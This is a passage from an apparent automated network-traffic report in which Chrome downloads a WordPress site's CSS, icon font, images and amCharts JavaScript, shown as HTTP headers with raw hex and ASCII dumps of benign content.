                                                                                                                                          2024-11-28 10:32:52 UTC8000INData Raw: 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 63 6f 6e 73 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2e 69 63 6f 2d 62 74 5f 66 6f 6f 74 65 72 5f 74 6f 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 30 30 34 31 22 7d 2e 69 63 6f 2d 62 74 2d 66 6f 6f 74 65 72 2d 6d 61 69 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 30 30 34 32 22 7d 2e 69 63 6f 2d 49 63 6f 6e 5f 41 72
                                                                                                                                          Data Ascii: e{display:inline-block;font-family:icons;font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.ico-bt_footer_top:before{content:"\0041"}.ico-bt-footer-mail:before{content:"\0042"}.ico-Icon_Ar
                                                                                                                                          2024-11-28 10:32:52 UTC8000INData Raw: 69 67 61 74 69 6f 6e 2e 70 6f 73 74 73 2d 6e 61 76 69 67 61 74 69 6f 6e 20 61 20 73 70 61 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 6e 61 76 69 67 61 74 69 6f 6e 2e 70 6f 73 74 73 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 6e 61 76 2d 6e 65 78 74 20 61 3a 62 65 66 6f 72 65 2c 2e 6e 61 76 69 67 61 74 69 6f 6e 2e 70 6f 73 74 73 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 20 61 3a 62 65 66 6f 72 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 63 6f 6e 73 3b 63 6f 6e 74 65 6e 74 3a 22 5c 30 30 34 36 22 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 34 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6e 61 76 69 67 61 74 69 6f 6e 2e 70 6f 73 74 73 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 6e 61 76 2d 6e 65 78 74 20 61
                                                                                                                                          Data Ascii: igation.posts-navigation a span{display:none}.navigation.posts-navigation .nav-next a:before,.navigation.posts-navigation .nav-previous a:before{font-family:icons;content:"\0046";font-size:34px;display:inline-block}.navigation.posts-navigation .nav-next a


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          41192.168.2.4498005.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:54 UTC668OUTGET /wp-content/themes/tentamus/dist/fonts/icons.woff HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Origin: https://www.agriparadigma.it
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                                          Referer: https://www.agriparadigma.it/wp-content/themes/tentamus/dist/styles/main.css?ver=2001211040
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:54 UTC279INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:54 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Oct 2021 10:15:54 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 2920
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:54 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: font/woff
                                                                                                                                          2024-11-28 10:32:54 UTC2920INData Raw: 77 4f 46 46 00 01 00 00 00 00 0b 68 00 0a 00 00 00 00 10 64 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4f 53 2f 32 00 00 00 f4 00 00 00 40 00 00 00 56 56 b6 63 42 63 6d 61 70 00 00 01 34 00 00 00 4a 00 00 01 4a 20 b6 19 92 67 6c 79 66 00 00 01 80 00 00 07 d5 00 00 0a a0 eb 48 b0 e1 68 65 61 64 00 00 09 58 00 00 00 31 00 00 00 36 0c eb 4b ca 68 68 65 61 00 00 09 8c 00 00 00 1c 00 00 00 24 08 9f 03 cf 68 6d 74 78 00 00 09 a8 00 00 00 0f 00 00 00 3c 3c 00 00 00 6c 6f 63 61 00 00 09 b8 00 00 00 20 00 00 00 20 13 08 15 5e 6d 61 78 70 00 00 09 d8 00 00 00 1f 00 00 00 20 01 2e 00 ee 6e 61 6d 65 00 00 09 f8 00 00 01 3d 00 00 02 49 d9 18 1d 0c 70 6f 73 74 00 00 0b 38 00 00 00 2e 00 00 00 50 07 53 07 3f 78 9c 63 60 64 61 60 9c c0 c0 ca
                                                                                                                                          Data Ascii: wOFFhdOS/2@VVcBcmap4JJ glyfHheadX16Khhea$hmtx<<loca ^maxp .name=Ipost8.PS?xc`da`


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          42192.168.2.4497995.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:54 UTC638OUTGET /wp-content/themes/tentamus-labor/images/MemberTag.png HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:54 UTC280INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:54 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Oct 2021 10:15:54 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 13065
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:54 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/png
                                                                                                                                          2024-11-28 10:32:54 UTC7912INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2a 00 00 00 f5 08 06 00 00 00 26 ab 67 a1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 32 c0 49 44 41 54 78 01 9d 5d 0b e0 97 e3 d9 be ff e5 90 48 a4 1c a2 90 90 0e 42 39 94 d3 54 d2 34 61 8e 73 cc 61 0e 33 87 39 7c 36 f6 91 8d 19 c3 c6 9c 66 36 b6 6f 73 1c 63 6c a6 28 67 46 39 56 48 52 29 87 48 28 24 f4 ff ae eb 7e ee eb 79 9f df db 3f c3 c3 ef bd ef e7 3e 5c f7 f5 3c ef f1 f7 be ef ef 5f 93 9d 30 ac d9 bc 51 34 25 55 4b 76 65 96 a4 af d4 3d 07 86 96 6c f2 95 d2 31 23 b8 2c d7 dc bc c0 5a 35 cd 04 ce 68 6b 5a e6 5a fb f5 5d 93 44 83 b2 c9 89 36 23 d1 93 94 49 20 36 47 4d 52 6a 23 23 8f f2 85 52 d9 69 21 bd c2 62 40 06 2b 74 d8 2a 8c c5 00 b9 ca 56 69 77 b2 8d ba 75 11 33 5a 99 93 44 04 c1
                                                                                                                                          Data Ascii: PNGIHDR*&ggAMAa2IDATx]HB9T4asa39|6f6oscl(gF9VHR)H($~y?>\<_0Q4%UKve=l1#,Z5hkZZ]D6#I 6GMRj##Ri!b@+t*Viwu3ZD
                                                                                                                                          2024-11-28 10:32:54 UTC5153INData Raw: ee 33 40 19 3a 13 73 01 fc a5 4c fc 11 15 de 1a e7 97 39 6e ab bc 52 e2 cb 04 6c 7c c3 6c e2 f4 a9 b6 43 9f 7e 4c 8a bc c0 67 48 0b 84 dc c6 7c d5 08 19 44 99 c5 0f 85 23 40 29 47 a9 2e 8b 30 08 cd c1 cc de c2 6d 71 3f 3c c1 ce 83 3e 7f 16 7c d8 d0 3d ac 23 1e de f6 c3 2b 6f 5b 62 1b 4e ad c0 73 03 12 4a 32 a5 ce da 5a ab 91 1d cf eb 45 00 c9 1e 10 6c 32 69 f4 f5 bc 5e 45 62 20 0f 4f 9c 60 eb ae d1 d9 ba 76 5a 03 6f 34 36 db ff dd 7f 97 0d d9 62 1b 7b e7 96 07 6d fc e5 37 d9 f2 cb 2d 67 b7 3f 72 7f 1e 98 8f 34 e0 83 03 44 0c a2 ac e7 31 58 04 9f 26 db 19 db e8 d2 1a f3 e9 75 1c 0e 26 12 65 44 bf cb ea 6b da da 78 a7 f9 85 d7 5e c1 df 2b f9 d8 5f cb 38 77 e4 f1 36 74 8b 81 fe 3a dc 3f 71 b1 72 fe cd 7f f0 bf 42 ac b4 25 a4 ea e7 5a 32 54 b2 09 7f 12 23 ed
                                                                                                                                          Data Ascii: 3@:sL9nRl|lC~LgH|D#@)G.0mq?<>|=#+o[bNsJ2ZEl2i^Eb O`vZo46b{m7-g?r4D1X&u&eDkx^+_8w6t:?qrB%Z2T#


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          43192.168.2.4498015.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:54 UTC640OUTGET /wp-content/uploads/sites/71/2017/06/AGRI_logo_Plain.jpg HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:54 UTC280INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:54 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 29 May 2018 16:08:40 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 8887
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:54 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          2024-11-28 10:32:54 UTC7912INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 04 03 03 03 03 03 04 03 03 04 06 04 03 04 06 07 05 04 04 05 07 08 06 06 07 06 06 08 0a 08 09 09 09 09 08 0a 0a 0c 0c 0c 0c 0c 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 04 05 05 08 07 08 0f 0a 0a 0f 14 0e 0e 0e 14 14 0e 0e 0e 0e 14 11 0c 0c 0c 0c 0c 11 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 6f 01 2c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 08 01 09 ff c4 00 43 10 00 01 03 03 02 04 02 05 0a 04 04 05 05 00 00 00 02 01 03 04 00 05 11 06 12 07 13 21 31 14 22 08 32 41 42 51 15 16 23 33 52 53
                                                                                                                                          Data Ascii: JFIFCCo,C!1"2ABQ#3RS
                                                                                                                                          2024-11-28 10:32:54 UTC975INData Raw: 8a f5 f5 ff 00 2f 65 ac 2f 48 bd 66 b3 d9 2d cd 16 b3 36 8f 3d 73 e1 9e 5b d2 77 af f6 db db 5b 47 9b 68 f6 3c f1 23 d1 7f 54 b4 d2 f8 7d 51 62 7e 42 16 10 0d f7 1a 45 0f 8a f9 17 af e1 5e 4c f0 fb 6d d2 d1 f5 3f 60 a7 ce 46 19 bf 9f a7 b4 57 6f 56 f5 9b 73 fd 16 88 f3 3d 9d 79 89 1e 8c 7a 8c 1a 45 63 52 d9 b9 e9 84 30 75 e7 14 7f 1c 2b 6d 92 ff 00 9d 4d b8 7c ed d2 df b1 4e 0f 9c 8a 4d a7 ca e9 e6 2b ea f9 3b f9 df a7 cf 1c bf aa ef dc 31 d3 f6 8e 19 e9 96 ac 36 84 62 4d c5 e2 e7 5d 2e 28 92 5d 39 32 55 30 a5 86 e3 fa a3 ea 80 e7 ca 3f 8e 6b d2 c5 8a 31 d7 96 1f 98 f1 7e 2d 9b 89 ea 6d 9f 2f 6c f4 ad 63 d1 c7 4f 56 95 fb 67 d6 b6 f6 6d e7 71 bf 4b 21 69 a4 92 df 5f 31 46 83 ca ca 7e 0e 4d 34 44 fd 79 75 6b c7 7d 85 60 b9 1a 99 38 e1 c2 e7 8a 0c b9 24 f2
                                                                                                                                          Data Ascii: /e/Hf-6=s[w[Gh<#T}Qb~BE^Lm?`FWoVs=yzEcR0u+mM|NM+;16bM].(]92U0?k1~-m/lcOVgmqK!i_1F~M4Dyuk}`8$


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          44192.168.2.4498025.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:54 UTC584OUTGET /wp-content/themes/tentamus/assets/scripts/amcharts4/core.js HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:54 UTC317INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:54 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Oct 2021 10:15:54 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 751172
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:54 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:32:54 UTC7875INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 61 6d 34 69 6e 74 65 72 6e 61 6c 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 3b 77 69 6e 64 6f 77 2e 61 6d 34 69 6e 74 65 72 6e 61 6c 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 3d 66 75 6e 63 74 69 6f 6e 28 69 2c 6f 2c 73 29 7b 66 6f 72 28 76 61 72 20 61 2c 75 2c 6c 2c 68 3d 30 2c 63 3d 5b 5d 3b 68 3c 69 2e 6c 65 6e 67 74 68 3b 68 2b 2b 29 75 3d 69 5b 68 5d 2c 6e 5b 75 5d 26 26 63 2e 70 75 73 68 28 6e 5b 75 5d 5b 30 5d 29 2c 6e 5b 75 5d 3d 30 3b 66 6f 72 28 61 20 69 6e 20 6f 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6f 2c 61 29 26 26 28 74 5b 61 5d 3d 6f 5b 61 5d 29 3b 66 6f 72 28 65 26 26 65 28 69 2c 6f 2c 73 29 3b
                                                                                                                                          Data Ascii: !function(t){var e=window.am4internal_webpackJsonp;window.am4internal_webpackJsonp=function(i,o,s){for(var a,u,l,h=0,c=[];h<i.length;h++)u=i[h],n[u]&&c.push(n[u][0]),n[u]=0;for(a in o)Object.prototype.hasOwnProperty.call(o,a)&&(t[a]=o[a]);for(e&&e(i,o,s);
                                                                                                                                          2024-11-28 10:32:54 UTC8000INData Raw: 3d 3d 3d 74 3f 30 3a 74 29 7d 3a 22 61 64 64 22 3d 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 61 6c 6c 28 74 68 69 73 2c 30 3d 3d 3d 74 3f 30 3a 74 29 2c 74 68 69 73 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 72 65 74 75 72 6e 20 65 2e 63 61 6c 6c 28 74 68 69 73 2c 30 3d 3d 3d 74 3f 30 3a 74 2c 69 29 2c 74 68 69 73 7d 29 7d 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 76 26 26 28 6d 7c 7c 78 2e 66 6f 72 45 61 63 68 26 26 21 63 28 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6e 65 77 20 76 29 2e 65 6e 74 72 69 65 73 28 29 2e 6e 65 78 74 28 29 7d 29 29 29 7b 76 61 72 20 4f 3d 6e 65 77 20 76 2c 53 3d 4f 5b 5f 5d 28 6d 3f 7b 7d 3a 2d 30 2c 31 29 21 3d 4f 2c 54 3d 63 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4f 2e
                                                                                                                                          Data Ascii: ===t?0:t)}:"add"==t?function(t){return e.call(this,0===t?0:t),this}:function(t,i){return e.call(this,0===t?0:t,i),this})};if("function"==typeof v&&(m||x.forEach&&!c(function(){(new v).entries().next()}))){var O=new v,S=O[_](m?{}:-0,1)!=O,T=c(function(){O.
                                                                                                                                          2024-11-28 10:32:54 UTC8000INData Raw: 68 69 73 29 2c 69 3d 22 66 6c 61 67 73 22 69 6e 20 75 3f 53 74 72 69 6e 67 28 74 2e 66 6c 61 67 73 29 3a 61 2e 63 61 6c 6c 28 74 29 2c 6e 3d 6e 65 77 20 52 65 67 45 78 70 28 74 2e 73 6f 75 72 63 65 2c 7e 69 2e 69 6e 64 65 78 4f 66 28 22 67 22 29 3f 69 3a 22 67 22 2b 69 29 3b 72 65 74 75 72 6e 20 6e 2e 6c 61 73 74 49 6e 64 65 78 3d 6f 28 74 2e 6c 61 73 74 49 6e 64 65 78 29 2c 6e 65 77 20 6c 28 6e 2c 65 29 7d 7d 29 7d 2c 22 31 71 61 6d 22 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 64 28 65 2c 22 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 29 3b 76 61 72 20 6e 3d 69 28 22 6d 34 2f 6c 22 29 2c 72 3d 69 28 22 56 73 37 52 22 29 2c 6f 3d 69 28 22 4d 74 70 6b 22 29 2c 73 3d 66 75 6e 63
                                                                                                                                          Data Ascii: his),i="flags"in u?String(t.flags):a.call(t),n=new RegExp(t.source,~i.indexOf("g")?i:"g"+i);return n.lastIndex=o(t.lastIndex),new l(n,e)}})},"1qam":function(t,e,i){"use strict";i.d(e,"a",function(){return s});var n=i("m4/l"),r=i("Vs7R"),o=i("Mtpk"),s=func
                                                                                                                                          2024-11-28 10:32:54 UTC8000INData Raw: 74 72 69 63 74 22 3b 69 2e 64 28 65 2c 22 62 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 29 2c 69 2e 64 28 65 2c 22 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 29 3b 76 61 72 20 6e 3d 69 28 22 6d 34 2f 6c 22 29 2c 72 3d 69 28 22 56 49 4f 62 22 29 2c 6f 3d 69 28 22 76 4d 71 4a 22 29 2c 73 3d 69 28 22 43 36 64 54 22 29 2c 61 3d 69 28 22 61 4d 37 44 22 29 2c 75 3d 69 28 22 74 6a 4d 53 22 29 2c 6c 3d 69 28 22 44 48 74 65 22 29 2c 68 3d 69 28 22 61 43 69 74 22 29 2c 63 3d 69 28 22 57 67 6c 74 22 29 2c 70 3d 69 28 22 4d 74 70 6b 22 29 2c 64 3d 69 28 22 68 44 35 41 22 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 65 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 7c 7c 74
                                                                                                                                          Data Ascii: trict";i.d(e,"b",function(){return f}),i.d(e,"a",function(){return g});var n=i("m4/l"),r=i("VIOb"),o=i("vMqJ"),s=i("C6dT"),a=i("aM7D"),u=i("tjMS"),l=i("DHte"),h=i("aCit"),c=i("Wglt"),p=i("Mtpk"),d=i("hD5A"),f=function(t){function e(){var e=t.call(this)||t
                                                                                                                                          2024-11-28 10:32:54 UTC8000INData Raw: 74 65 6d 70 6c 61 74 65 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 6e 2e 61 78 69 73 46 69 6c 6c 73 2e 74 65 6d 70 6c 61 74 65 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 6e 2e 62 61 73 65 47 72 69 64 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 6e 2e 6c 61 62 65 6c 73 2e 74 65 6d 70 6c 61 74 65 2e 70 61 64 64 69 6e 67 28 32 2c 33 2c 32 2c 33 29 2c 6e 2e 6d 69 6e 48 65 69 67 68 74 3d 76 6f 69 64 20 30 2c 6e 2e 6d 69 6e 57 69 64 74 68 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 6d 61 72 6b 65 72 43 6f 6e 74 61 69 6e 65 72 2e 6c 61 79 6f 75 74 3d 74 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 22 76 61 6c 75 65 41 78 69
                                                                                                                                          Data Ascii: template.disabled=!0,n.axisFills.template.disabled=!0,n.baseGrid.disabled=!0,n.labels.template.padding(2,3,2,3),n.minHeight=void 0,n.minWidth=void 0,this.markerContainer.layout=t},enumerable:!0,configurable:!0}),Object.defineProperty(e.prototype,"valueAxi
                                                                                                                                          2024-11-28 10:32:55 UTC8000INData Raw: 61 73 65 3f 22 69 22 3a 22 22 29 2b 28 74 2e 6d 75 6c 74 69 6c 69 6e 65 3f 22 6d 22 3a 22 22 29 2b 28 74 2e 75 6e 69 63 6f 64 65 3f 22 75 22 3a 22 22 29 2b 28 74 2e 73 74 69 63 6b 79 3f 22 79 22 3a 22 22 29 2c 70 3d 30 2c 64 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 34 32 39 34 39 36 37 32 39 35 3a 65 3e 3e 3e 30 2c 66 3d 6e 65 77 20 52 65 67 45 78 70 28 74 2e 73 6f 75 72 63 65 2c 68 2b 22 67 22 29 3b 28 6f 3d 6c 2e 63 61 6c 6c 28 66 2c 72 29 29 26 26 21 28 28 73 3d 66 2e 6c 61 73 74 49 6e 64 65 78 29 3e 70 26 26 28 75 2e 70 75 73 68 28 72 2e 73 6c 69 63 65 28 70 2c 6f 2e 69 6e 64 65 78 29 29 2c 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 6f 2e 69 6e 64 65 78 3c 72 2e 6c 65 6e 67 74 68 26 26 63 2e 61 70 70 6c 79 28 75 2c 6f 2e 73 6c 69 63 65 28 31 29 29 2c 61 3d 6f 5b
                                                                                                                                          Data Ascii: ase?"i":"")+(t.multiline?"m":"")+(t.unicode?"u":"")+(t.sticky?"y":""),p=0,d=void 0===e?4294967295:e>>>0,f=new RegExp(t.source,h+"g");(o=l.call(f,r))&&!((s=f.lastIndex)>p&&(u.push(r.slice(p,o.index)),o.length>1&&o.index<r.length&&c.apply(u,o.slice(1)),a=o[
                                                                                                                                          2024-11-28 10:32:55 UTC8000INData Raw: 65 74 28 74 2c 65 29 7d 2c 6b 65 79 73 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 69 3d 75 28 74 2c 65 2c 21 31 29 2c 6e 3d 5b 5d 3b 72 65 74 75 72 6e 20 69 26 26 69 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 6e 2e 70 75 73 68 28 65 29 7d 29 2c 6e 7d 2c 6b 65 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 22 73 79 6d 62 6f 6c 22 3d 3d 6e 28 74 29 3f 74 3a 53 74 72 69 6e 67 28 74 29 7d 2c 65 78 70 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6f 28 6f 2e 53 2c 22 52 65 66 6c 65 63 74 22 2c 74 29 7d 7d 7d 2c 22 36 50 71 59 22 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 76 61 72 20 6e 3d 69 28 22 47 62 31 48 22 29 2c 72 3d 69 28 22 35 2b 53 4b 22 29 2c 6f 3d 69 28 22
                                                                                                                                          Data Ascii: et(t,e)},keys:function(t,e){var i=u(t,e,!1),n=[];return i&&i.forEach(function(t,e){n.push(e)}),n},key:function(t){return void 0===t||"symbol"==n(t)?t:String(t)},exp:function(t){o(o.S,"Reflect",t)}}},"6PqY":function(t,e,i){var n=i("Gb1H"),r=i("5+SK"),o=i("
